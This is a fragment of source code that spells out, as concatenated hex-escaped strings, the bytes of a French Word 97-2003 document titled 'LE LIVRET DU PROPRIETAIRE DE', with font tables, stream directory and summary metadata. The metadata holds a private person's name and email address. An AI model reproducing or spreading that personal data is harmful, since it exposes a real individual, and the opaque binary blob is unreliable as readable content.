+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" +"\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" +"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01" +"\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" +"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01" +"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" +"\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01" +"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" +"\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" +"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01" +"\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" +"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01" +"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" +"\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01" +"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" +"\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" +"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01" +"\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" 
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01" +"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" +"\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01" +"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" +"\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" +"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01" +"\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" +"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01" +"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" +"\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01" +"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" +"\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" +"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01" +"\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" +"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01" +"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" +"\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01" +"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" +"\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" +"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01" +"\x00\x04\x02\x01\x00\x00\x02\x01\x00\x6e\x02\x01\x00\x00\x02\x01" +"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01" +"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" +"\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01" +"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" +"\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" +"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01" +"\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" +"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01" 
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" +"\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01" +"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" +"\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" +"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x96\x01" +"\x00\x04\x21\x86\x02\x30\x00\x00\x00\x00\xff\x40\x01\x80\x01\x00" +"\x7d\x71\x00\x00\x7d\x71\x00\x00\x18\x30\x22\x02\x01\x00\x01\x00" +"\x7d\x71\x00\x00\x00\x00\x00\x00\x7d\x71\x00\x00\x00\x00\x00\x00" +"\x02\x10\x00\x00\x00\x00\x00\x00\x00\x1a\x74\x00\x00\x70\x00\x00" +"\x10\x00\x40\x00\x00\xff\xff\x01\x00\x00\x00\x07\x00\x55\x00\x6e" +"\x00\x6b\x00\x6e\x00\x6f\x00\x77\x00\x6e\x00\xff\xff\x01\x00\x08" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x01\x00\x00" +"\x00\x00\x00\xff\xff\x00\x00\x02\x00\xff\xff\x00\x00\x00\x00\xff" +"\xff\x00\x00\x02\x00\xff\xff\x00\x00\x00\x00\x04\x00\x00\x00\x47" +"\x16\x90\x01\x00\x00\x02\x02\x06\x03\x05\x04\x05\x02\x03\x04\x87" +"\x7a\x00\x20\x00\x00\x00\x80\x08\x00\x00\x00\x00\x00\x00\x00\xff" +"\x01\x00\x00\x00\x00\x00\x00\x54\x00\x69\x00\x6d\x00\x65\x00\x73" +"\x00\x20\x00\x4e\x00\x65\x00\x77\x00\x20\x00\x52\x00\x6f\x00\x6d" +"\x00\x61\x00\x6e\x00\x00\x00\x35\x16\x90\x01\x02\x00\x05\x05\x01" +"\x02\x01\x07\x06\x02\x05\x07\x00\x00\x00\x00\x00\x00\x00\x10\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x53" +"\x00\x79\x00\x6d\x00\x62\x00\x6f\x00\x6c\x00\x00\x00\x33\x26\x90" +"\x01\x00\x00\x02\x0b\x06\x04\x02\x02\x02\x02\x02\x04\x87\x7a\x00" +"\x20\x00\x00\x00\x80\x08\x00\x00\x00\x00\x00\x00\x00\xff\x01\x00" +"\x00\x00\x00\x00\x00\x41\x00\x72\x00\x69\x00\x61\x00\x6c\x00\x00" +"\x00\x3b\x06\x90\x01\x86\x07\x02\x01\x06\x00\x03\x01\x01\x01\x01" +"\x01\x03\x00\x00\x00\x00\x00\x0e\x08\x10\x00\x00\x00\x00\x00\x00" +"\x00\x01\x00\x04\x00\x00\x00\x00\x00\x53\x00\x69\x00\x6d\x00\x53" +"\x00\x75\x00\x6e\x00\x00\x00\x8b\x5b\x53\x4f\x00\x00\x22\x00\x04" 
+"\x00\x71\x08\x88\x18\x00\xf0\xc5\x02\x00\x00\xa9\x01\x00\x00\x00" +"\x00\x33\x8d\xa1\x46\x21\x95\xa1\x66\x71\x1d\x82\x46\x04\x00\x02" +"\x00\x00\x00\xd3\x11\x00\x00\x0c\x62\x00\x00\x01\x00\x3b\x00\x00" +"\x00\x04\x00\x83\x10\xd1\x00\x00\x00\xd3\x11\x00\x00\x0c\x62\x00" +"\x00\x01\x00\x3b\x00\x00\x00\xd1\x00\x00\x00\x00\x00\x00\x00\x21" +"\x03\x00\xf0\x10\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa5\x06\xc0" +"\x07\xb4\x00\xb4\x00\x80\x00\x32\x34\x00\x00\x10\x00\x19\x00\x64" +"\x00\x00\x00\x19\x00\x00\x00\xa4\x73\x00\x00\xa4\x73\x00\x00\x00" +"\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x01\x33\x83\x51\x00\xf0\x10\x04\xdf\xdf\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x48\x00\x00\x00\x00" +"\x00\x28\xf0\xff\x0f\x01\x00\x01\x3f\x00\x00\xe4\x04\x00\x00\xff" +"\xff\xff\x7f\xff\xff\xff\x7f\xff\xff\xff\x7f\xff\xff\xff\x7f\xff" +"\xff\xff\x7f\xff\xff\xff\x7f\xff\xff\xff\x7f\xae\x0f\x6a\x00\xff" +"\xff\x12\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x4c\x00\x45\x00\x20" +"\x00\x4c\x00\x49\x00\x56\x00\x52\x00\x45\x00\x54\x00\x20\x00\x44" +"\x00\x55\x00\x20\x00\x50\x00\x52\x00\x4f\x00\x50\x00\x52\x00\x49" +"\x00\x45\x00\x54\x00\x41\x00\x49\x00\x52\x00\x45\x00\x20\x00\x44" +"\x00\x45\x00\x00\x00\x00\x00\x00\x00\x03\x00\x2a\x00\x2a\x00\x2a" +"\x00\x03\x00\x50\x00\x61\x00\x74\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x52\x00\x6f\x00\x6f\x00\x74\x00\x20\x00\x45\x00\x6e\x00\x74\x00" +"\x72\x00\x79\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x16\x00\x05\x01\xff\xff\xff\xff\xff\xff\xff\xff\x03\x00\x00\x00" +"\x06\x09\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46" 
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0\x9f\xde\x2d" +"\x61\x5a\xc6\x01\xe1\x00\x00\x00\x80\x05\x00\x00\x00\x00\x00\x00" +"\x44\x00\x61\x00\x74\x00\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x0a\x00\x02\x01\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x82\x00\x00\x00\x2c\x22\x00\x00\x00\x00\x00\x00" +"\x31\x00\x54\x00\x61\x00\x62\x00\x6c\x00\x65\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x0e\x00\x02\x01\x01\x00\x00\x00\x06\x00\x00\x00\xff\xff\xff\xff" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x94\x00\x00\x00\x7d\x6f\x00\x00\x00\x00\x00\x00" +"\x57\x00\x6f\x00\x72\x00\x64\x00\x44\x00\x6f\x00\x63\x00\x75\x00" +"\x6d\x00\x65\x00\x6e\x00\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x1a\x00\x02\x01\x02\x00\x00\x00\x05\x00\x00\x00\xff\xff\xff\xff" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x29\x02\x01\xb4\x00\x00\x00\x00" +"\x81\x00\x00\x00\xfe\xff\xff\xff\x83\x00\x00\x00\x84\x00\x00\x00" +"\x85\x00\x00\x00\x86\x00\x00\x00\x87\x00\x00\x00\x88\x00\x00\x00" +"\x89\x00\x00\x00\x8a\x00\x00\x00\x8b\x00\x00\x00\x8c\x00\x00\x00" 
+"\x8d\x00\x00\x00\x8e\x00\x00\x00\x8f\x00\x00\x00\x90\x00\x00\x00" +"\x91\x00\x00\x00\x92\x00\x00\x00\x93\x00\x00\x00\xfe\xff\xff\xff" +"\x95\x00\x00\x00\x96\x00\x00\x00\x97\x00\x00\x00\x98\x00\x00\x00" +"\x99\x00\x00\x00\x9a\x00\x00\x00\x9b\x00\x00\x00\x9c\x00\x00\x00" +"\x9d\x00\x00\x00\x9e\x00\x00\x00\x9f\x00\x00\x00\xa0\x00\x00\x00" +"\xa1\x00\x00\x00\xa2\x00\x00\x00\xa3\x00\x00\x00\xa4\x00\x00\x00" +"\xa5\x00\x00\x00\xa6\x00\x00\x00\xa7\x00\x00\x00\xa8\x00\x00\x00" +"\xa9\x00\x00\x00\xaa\x00\x00\x00\xab\x00\x00\x00\xac\x00\x00\x00" +"\xad\x00\x00\x00\xae\x00\x00\x00\xaf\x00\x00\x00\xb0\x00\x00\x00" +"\xb1\x00\x00\x00\xb2\x00\x00\x00\xb3\x00\x00\x00\xb4\x00\x00\x00" +"\xb5\x00\x00\x00\xb6\x00\x00\x00\xb7\x00\x00\x00\xb8\x00\x00\x00" +"\xb9\x00\x00\x00\xba\x00\x00\x00\xbb\x00\x00\x00\xbc\x00\x00\x00" +"\xbd\x00\x00\x00\xbe\x00\x00\x00\xbf\x00\x00\x00\xc0\x00\x00\x00" +"\xc1\x00\x00\x00\xc2\x00\x00\x00\xc3\x00\x00\x00\xc4\x00\x00\x00" +"\xc5\x00\x00\x00\xc6\x00\x00\x00\xc7\x00\x00\x00\xc8\x00\x00\x00" +"\xc9\x00\x00\x00\xca\x00\x00\x00\xcb\x00\x00\x00\xfe\xff\xff\xff" +"\xd0\x00\x00\x00\xfd\xff\xff\xff\xfe\xff\xff\xff\xfe\xff\xff\xff" +"\xfe\xff\xff\xff\xcf\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xfd\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xd1\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
+"\x01\x00\x00\x00\xfe\xff\xff\xff\x03\x00\x00\x00\x04\x00\x00\x00" +"\x05\x00\x00\x00\x06\x00\x00\x00\x07\x00\x00\x00\x08\x00\x00\x00" +"\xfe\xff\xff\xff\x0a\x00\x00\x00\x0b\x00\x00\x00\x0c\x00\x00\x00" +"\x0d\x00\x00\x00\x0e\x00\x00\x00\x0f\x00\x00\x00\x10\x00\x00\x00" +"\x11\x00\x00\x00\x12\x00\x00\x00\x13\x00\x00\x00\x14\x00\x00\x00" +"\x15\x00\x00\x00\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\x03\x00\x00\x00\x0e\x00\x00\x00\x5f\x00\x45\x00\x6d\x00\x61\x00" +"\x69\x00\x6c\x00\x53\x00\x75\x00\x62\x00\x6a\x00\x65\x00\x63\x00" +"\x74\x00\x00\x00\x04\x00\x00\x00\x0d\x00\x00\x00\x5f\x00\x41\x00" +"\x75\x00\x74\x00\x68\x00\x6f\x00\x72\x00\x45\x00\x6d\x00\x61\x00" +"\x69\x00\x6c\x00\x00\x00\x00\x00\x05\x00\x00\x00\x18\x00\x00\x00" +"\x5f\x00\x41\x00\x75\x00\x74\x00\x68\x00\x6f\x00\x72\x00\x45\x00" +"\x6d\x00\x61\x00\x69\x00\x6c\x00\x44\x00\x69\x00\x73\x00\x70\x00" +"\x6c\x00\x61\x00\x79\x00\x4e\x00\x61\x00\x6d\x00\x65\x00\x00\x00" +"\x02\x00\x00\x00\xb0\x04\x00\x00\x13\x00\x00\x00\x0c\x04\x00\x00" +"\x03\x00\x00\x00\x0c\xcb\xf4\x5d\x1f\x00\x00\x00\x2f\x00\x00\x00" +"\x6d\x00\x69\x00\x73\x00\x65\x00\x20\x00\x20\x00\x6a\x00\x6f\x00" +"\x75\x00\x72\x00\x20\x00\x72\x00\xe9\x00\x67\x00\x6c\x00\x65\x00" +"\x6d\x00\x65\x00\x6e\x00\x74\x00\x73\x00\x20\x00\x2b\x00\x20\x00" +"\x66\x00\x65\x00\x75\x00\x69\x00\x6c\x00\x6c\x00\x65\x00\x20\x00" +"\x65\x00\x6e\x00\x67\x00\x61\x00\x67\x00\x65\x00\x6d\x00\x65\x00" +"\x6e\x00\x74\x00\x20\x00\x45\x00\x4e\x00\x43\x00\x00\x00\x00\x00" +"\x1f\x00\x00\x00\x1a\x00\x00\x00\x70\x00\x69\x00\x63\x00\x61\x00" +"\x72\x00\x64\x00\x65\x00\x6e\x00\x40\x00\x63\x00\x6c\x00\x75\x00" +"\x62\x00\x2d\x00\x69\x00\x6e\x00\x74\x00\x65\x00\x72\x00\x6e\x00" +"\x65\x00\x74\x00\x2e\x00\x66\x00\x72\x00\x00\x00\x1f\x00\x00\x00" +"\x10\x00\x00\x00\x50\x00\x61\x00\x74\x00\x72\x00\x69\x00\x63\x00" +"\x69\x00\x61\x00\x20\x00\x4d\x00\x4f\x00\x4e\x00\x49\x00\x4f\x00" +"\x54\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x05\x00\x53\x00\x75\x00\x6d\x00\x6d\x00\x61\x00\x72\x00\x79\x00" +"\x49\x00\x6e\x00\x66\x00\x6f\x00\x72\x00\x6d\x00\x61\x00\x74\x00" +"\x69\x00\x6f\x00\x6e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x28\x00\x02\x01\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x02\x00\x00\x00\xb0\x01\x00\x00\x00\x00\x00\x00" +"\x05\x00\x44\x00\x6f\x00\x63\x00\x75\x00\x6d\x00\x65\x00\x6e\x00" +"\x74\x00\x53\x00\x75\x00\x6d\x00\x6d\x00\x61\x00\x72\x00\x79\x00" +"\x49\x00\x6e\x00\x66\x00\x6f\x00\x72\x00\x6d\x00\x61\x00\x74\x00" +"\x69\x00\x6f\x00\x6e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x38\x00\x02\x01\x04\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x09\x00\x00\x00\x24\x03\x00\x00\x00\x00\x00\x00" +"\x01\x00\x43\x00\x6f\x00\x6d\x00\x70\x00\x4f\x00\x62\x00\x6a\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x12\x00\x02\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
+"\x00\x00\x00\x00\x00\x00\x00\x00\x6a\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 